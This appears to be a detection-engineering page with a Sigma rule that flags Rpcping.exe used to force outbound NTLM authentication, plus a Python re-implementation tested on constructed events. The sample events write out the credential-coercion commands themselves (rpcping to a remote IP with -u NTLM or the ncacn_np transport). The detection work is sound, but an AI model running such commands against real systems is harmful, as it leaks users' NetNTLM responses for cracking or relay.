Capture Credentials with Rpcping.exe
Detects use of Rpcping.exe to send an RPC test connection to a target server (-s) while forcing NTLM authentication, either explicitly with -u NTLM or implicitly via the ncacn_np named-pipe transport (-t), which authenticates over SMB. Pointed at an attacker-controlled listener, this makes the local account authenticate outbound, so the NetNTLM challenge-response (not the raw NT hash) can be captured and cracked or relayed.
Sigma rule

```yaml
title: Capture Credentials with Rpcping.exe
id: 93671f99-04eb-4ab4-a161-70d446a84003
status: test
description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Rpcping/
    - https://twitter.com/vysecurity/status/974806438316072960
    - https://twitter.com/vysecurity/status/873181705024266241
    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)
author: Julia Fomina, oscd.community
date: 2020-10-09
modified: 2024-03-13
tags:
    - attack.credential-access
    - attack.t1003
logsource:
    category: process_creation
    product: windows
detection:
    use_rpcping:
        Image|endswith: '\rpcping.exe'
    remote_server:
        CommandLine|contains|windash: '-s'
    ntlm_auth:
        - CommandLine|contains|all|windash:
              - '-u'
              - 'NTLM'
        - CommandLine|contains|all|windash:
              - '-t'
              - 'ncacn_np'
    condition: use_rpcping and remote_server and ntlm_auth
falsepositives:
    - Unlikely
level: medium
```
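To show what the three selections above actually match, here is the rule's logic re-implemented by hand in Python and run over a handful of constructed process_creation events. This is an added example, not code from the Sigma project or from the rule author; the sample events are made up for illustration, and the `windash` expansion follows my reading of the Sigma specification (a `-` in the search value may also appear as `/` or one of the Unicode dash variants), which is an assumption here, with pySigma being the authoritative implementation.

```python
from itertools import product

# Constructed sample process_creation events (Sysmon Event ID 1 style fields).
# These are written for this example only and are not real telemetry.
SAMPLE_EVENTS = [
    # 1: the coercion one-liner from the referenced tweet, explicit -u NTLM
    {"Image": r"C:\Windows\System32\rpcping.exe",
     "CommandLine": "rpcping -s 10.10.20.5 -e 1234 -a privacy -u NTLM"},
    # 2: same idea with Windows-style slashes and the SMB named-pipe transport
    {"Image": r"C:\Windows\System32\rpcping.exe",
     "CommandLine": "rpcping /s 10.10.20.5 /t ncacn_np"},
    # 3: rpcping to a server over TCP with Negotiate: no NTLM/ncacn_np token
    {"Image": r"C:\Windows\System32\rpcping.exe",
     "CommandLine": "rpcping -s rpcsrv01 -t ncacn_ip_tcp -u Negotiate"},
    # 4: ordinary ping.exe; the image does not end in \rpcping.exe
    {"Image": r"C:\Windows\System32\PING.EXE",
     "CommandLine": "ping -s 3 10.10.20.5"},
    # 5: NTLM and named pipe present but no -s, so no remote target
    {"Image": r"C:\Windows\System32\rpcping.exe",
     "CommandLine": "rpcping -t ncacn_np -u NTLM"},
]

# Assumed windash variant set: ASCII hyphen and slash plus the Unicode dashes
# Windows command parsers accept (en dash, em dash, horizontal bar).
DASH_VARIANTS = ("-", "/", "\u2013", "\u2014", "\u2015")


def windash_variants(value):
    """Expand every '-' in value into each dash variant (Sigma windash)."""
    slots = [i for i, ch in enumerate(value) if ch == "-"]
    if not slots:
        return [value]
    variants = []
    for combo in product(DASH_VARIANTS, repeat=len(slots)):
        chars = list(value)
        for i, repl in zip(slots, combo):
            chars[i] = repl
        variants.append("".join(chars))
    return variants


def contains(haystack, needle):
    """Sigma string matching is case-insensitive by default."""
    return needle.lower() in haystack.lower()


def contains_windash(cmdline, value):
    """CommandLine|contains|windash: any dash variant of value is a hit."""
    return any(contains(cmdline, v) for v in windash_variants(value))


def contains_all_windash(cmdline, values):
    """CommandLine|contains|all|windash: every value must be present."""
    return all(contains_windash(cmdline, v) for v in values)


def matches_rule(event):
    """Evaluate: use_rpcping and remote_server and ntlm_auth."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    use_rpcping = image.lower().endswith("\\rpcping.exe")
    remote_server = contains_windash(cmd, "-s")
    # ntlm_auth is a list of two maps, so it is an OR of two AND groups
    ntlm_auth = (contains_all_windash(cmd, ["-u", "NTLM"])
                 or contains_all_windash(cmd, ["-t", "ncacn_np"]))
    return use_rpcping and remote_server and ntlm_auth


def run_detection(events):
    """Return one verdict per event, in input order."""
    return [matches_rule(e) for e in events]


if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, run_detection(SAMPLE_EVENTS)):
        print("ALERT " if hit else "      ", event["CommandLine"])
```

Two things worth noticing from the walk-through: the `remote_server` selection is a bare substring test for `-s` (or `/s`), so on its own it would hit almost any rpcping invocation, and the real narrowing comes from `ntlm_auth`; and because `ncacn_np` authenticates at the SMB layer, a hostname target may still end up using Kerberos, so that branch is a strong hint of intent rather than proof that NTLM was sent. Tune by adding the source host, parent process, or target address if this fires in an environment where RPC connectivity testing is routine.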
Related rules
- Access To Crypto Currency Wallets By Uncommon Applications
- Credential Manager Access By Uncommon Applications
- Esentutl Gather Credentials
- HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
- HackTool - Rubeus Execution